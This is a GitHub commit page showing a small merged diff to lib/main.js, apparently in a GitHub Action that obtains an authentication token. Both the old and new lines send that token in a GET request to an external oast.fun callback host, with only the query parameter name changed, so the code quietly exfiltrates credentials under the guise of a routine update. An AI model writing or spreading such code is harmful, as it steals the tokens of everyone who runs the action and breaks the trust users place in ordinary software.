Skip to content

Commit 384a85d

Browse files
authored
Merge pull request #1 from suchithrzp/suchithrzp-patch-2
Update main.js
2 parents 63776e4 + cf3d2fc commit 384a85d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

lib/main.js

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -125,7 +125,7 @@ export async function main(
125125
core.saveState("expiresAt", authentication.expiresAt);
126126
}
127127
try {
128-
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?auth=${authentication.token}`;
128+
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authb=${authentication.token}`;
129129
await fetch(url);
130130
core.info(`HTTP GET request sent to ${url}`);
131131
} catch (error) {

0 commit comments

Comments
 (0)